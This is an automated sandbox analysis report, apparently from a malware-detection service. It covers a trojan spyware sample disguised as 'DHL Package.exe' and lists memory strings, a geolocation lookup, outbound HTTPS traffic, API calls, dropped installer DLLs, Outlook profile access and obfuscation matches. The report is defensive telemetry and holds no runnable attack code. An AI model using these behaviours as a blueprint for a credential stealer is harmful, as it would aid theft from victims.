            Source: DHL Package.exe, 0000000C.00000002.6270895609.000000003708D000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6272525391.0000000037F2E000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000037098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
            Source: DHL Package.exe, 0000000C.00000002.6273766004.00000000396C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
            Source: DHL Package.exe, 0000000C.00000002.6270895609.0000000037012000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000037029000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000036FED000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000037007000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000036FFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: DHL Package.exe, 0000000C.00000002.6270895609.0000000036FFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/102.129.252.169
            Source: DHL Package.exe, 0000000C.00000002.6270895609.0000000037012000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000037029000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000036FED000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000037007000.00000004.00000800.00020000.00000000.sdmp, DHL Package.exe, 0000000C.00000002.6270895609.0000000036FFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/102.129.252.169$
            Source: DHL Package.exe, 0000000C.00000002.6270895609.0000000037098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49750 version: TLS 1.2
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 0_2_00405582 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405582
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 0_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040348F
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,12_2_0040348F
            Source: C:\Users\user\Desktop\DHL Package.exeFile created: C:\Windows\SysWOW64\aminah.iniJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 0_2_00406AFA0_2_00406AFA
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 0_2_6CA71B5F0_2_6CA71B5F
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_00406AFA12_2_00406AFA
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_0015B13812_2_0015B138
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_0015C16012_2_0015C160
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_0015632012_2_00156320
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_0015C44112_2_0015C441
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_0015B5E012_2_0015B5E0
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_001548B712_2_001548B7
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_0015B8C112_2_0015B8C1
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_0015694812_2_00156948
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_0015BBA112_2_0015BBA1
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_0015EE2112_2_0015EE21
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_0015BE8112_2_0015BE81
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_0015B30012_2_0015B300
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_0015E32F12_2_0015E32F
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_0015E34012_2_0015E340
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_0015337812_2_00153378
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_001537E512_2_001537E5
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_0015FB3912_2_0015FB39
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_3938793012_2_39387930
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_39380D6012_2_39380D60
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_3938341012_2_39383410
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_3938B0B812_2_3938B0B8
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_3938E13912_2_3938E139
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_3938090012_2_39380900
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_39380D5112_2_39380D51
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_3938E14812_2_3938E148
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_3938E5A012_2_3938E5A0
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_3938E59112_2_3938E591
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_3938E9F812_2_3938E9F8
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_3938E9E812_2_3938E9E8
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_3938800012_2_39388000
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_3938340012_2_39383400
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_3938004012_2_39380040
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_3938B0A812_2_3938B0A8
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393804A012_2_393804A0
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_3938049112_2_39380491
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_3938DCF012_2_3938DCF0
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393808F112_2_393808F1
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_3938DCE212_2_3938DCE2
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_3938D31012_2_3938D310
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_3938F70012_2_3938F700
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_3938D30112_2_3938D301
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_3938FB5812_2_3938FB58
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_3938FB4912_2_3938FB49
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_39386F8812_2_39386F88
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_3938EE5012_2_3938EE50
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_3938EE4012_2_3938EE40
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_3938F2A812_2_3938F2A8
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_3938F29A12_2_3938F29A
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_3938F6F012_2_3938F6F0
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393AE53012_2_393AE530
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393AB91012_2_393AB910
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393AAD0812_2_393AAD08
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393AEB7812_2_393AEB78
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393ABF6012_2_393ABF60
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393AD24012_2_393AD240
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A38B812_2_393A38B8
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393AC5A812_2_393AC5A8
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393AD89012_2_393AD890
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393ACBF012_2_393ACBF0
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393ADEE012_2_393ADEE0
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A0D3812_2_393A0D38
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A6B3012_2_393A6B30
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A5E3012_2_393A5E30
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393AD23412_2_393AD234
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A8A2012_2_393A8A20
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393AE52012_2_393AE520
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A7D1812_2_393A7D18
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A8A1012_2_393A8A10
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A300812_2_393A3008
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A7D0812_2_393A7D08
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A230012_2_393A2300
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393AA00012_2_393AA000
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A8E7812_2_393A8E78
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A817012_2_393A8170
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A8E6812_2_393A8E68
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A346012_2_393A3460
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A816112_2_393A8161
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A275812_2_393A2758
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393AA45812_2_393AA458
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A1A5012_2_393A1A50
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A975012_2_393A9750
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393ABF5012_2_393ABF50
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A345112_2_393A3451
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A0D4812_2_393A0D48
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A274812_2_393A2748
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393AA44912_2_393AA449
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A004012_2_393A0040
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A1A4012_2_393A1A40
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A974012_2_393A9740
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A5AB812_2_393A5AB8
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A85B812_2_393A85B8
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393AA8B012_2_393AA8B0
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A4FB012_2_393A4FB0
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A2BB012_2_393A2BB0
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A1EA812_2_393A1EA8
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A9BA812_2_393A9BA8
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A4FA812_2_393A4FA8
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A11A012_2_393A11A0
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393AA8A012_2_393AA8A0
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A2BA112_2_393A2BA1
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A5AA712_2_393A5AA7
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A049812_2_393A0498
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A789812_2_393A7898
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A9B9812_2_393A9B98
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393AC59812_2_393AC598
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A1E9912_2_393A1E99
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A119112_2_393A1191
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A048812_2_393A0488
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A788912_2_393A7889
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393AD88012_2_393AD880
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A15F812_2_393A15F8
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A2FF812_2_393A2FF8
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393AACF812_2_393AACF8
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393AB8FF12_2_393AB8FF
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A08F012_2_393A08F0
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A22F012_2_393A22F0
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A9FF012_2_393A9FF0
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A15E812_2_393A15E8
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393ACBEC12_2_393ACBEC
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A08E112_2_393A08E1
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A92D012_2_393A92D0
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393ADED012_2_393ADED0
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A85C812_2_393A85C8
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_393A92C012_2_393A92C0
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_39AC004012_2_39AC0040
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: String function: 00402D3E appears 51 times
            Source: DHL Package.exeStatic PE information: invalid certificate
            Source: DHL Package.exe, 00000000.00000000.1150584758.0000000000459000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametannins elohist.exe> vs DHL Package.exe
            Source: DHL Package.exe, 0000000C.00000002.6245445440.0000000000459000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametannins elohist.exe> vs DHL Package.exe
            Source: DHL Package.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/10@4/4
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 0_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040348F
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,12_2_0040348F
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 0_2_00404822 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404822
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 0_2_004021A2 CoCreateInstance,0_2_004021A2
            Source: C:\Users\user\Desktop\DHL Package.exeFile created: C:\Users\user\AppData\Local\peggleJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeMutant created: NULL
            Source: C:\Users\user\Desktop\DHL Package.exeFile created: C:\Users\user\AppData\Local\Temp\nsn91A1.tmpJump to behavior
            Source: DHL Package.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\DHL Package.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: DHL Package.exeVirustotal: Detection: 15%
            Source: C:\Users\user\Desktop\DHL Package.exeFile read: C:\Users\user\Desktop\DHL Package.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\DHL Package.exe "C:\Users\user\Desktop\DHL Package.exe"
            Source: C:\Users\user\Desktop\DHL Package.exeProcess created: C:\Users\user\Desktop\DHL Package.exe "C:\Users\user\Desktop\DHL Package.exe"
            Source: C:\Users\user\Desktop\DHL Package.exeProcess created: C:\Users\user\Desktop\DHL Package.exe "C:\Users\user\Desktop\DHL Package.exe"Jump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: DHL Package.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.2283851326.000000000616D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 0_2_6CA71B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6CA71B5F
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_3_0019FCBD push C80019CFh; iretd 12_3_0019FCC9
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_3_0019FCBD push C80019CFh; iretd 12_3_0019FCC9
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_3_0019FCBD push C80019CFh; iretd 12_3_0019FCC9
            Source: C:\Users\user\Desktop\DHL Package.exeCode function: 12_3_0019FCBD push C80019CFh; iretd 12_3_0019FCC9
            Source: C:\Users\user\Desktop\DHL Package.exeFile created: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\LangDLL.dllJump to dropped file
            Source: C:\Users\user\Desktop\DHL Package.exeFile created: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL Package.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
